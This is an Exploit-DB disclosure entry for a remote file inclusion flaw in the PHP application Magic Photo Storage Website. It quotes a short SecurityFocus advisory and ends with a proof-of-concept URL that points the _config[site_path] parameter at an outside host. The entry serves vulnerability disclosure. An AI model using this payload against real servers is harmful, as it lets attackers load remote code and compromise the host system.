Magic Photo Storage Website - '/user/add_news.php?_config[site_path]' Remote File Inclusion

EDB-ID:

29421


Author:

IbnuSina

Type:

webapps


Platform:

PHP

Date:

2007-01-09


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

source: https://www.securityfocus.com/bid/21965/info
              
Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
              
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.

http://www.example.com/path/user/add_news.php?_config[site_path]=http://www.example2.com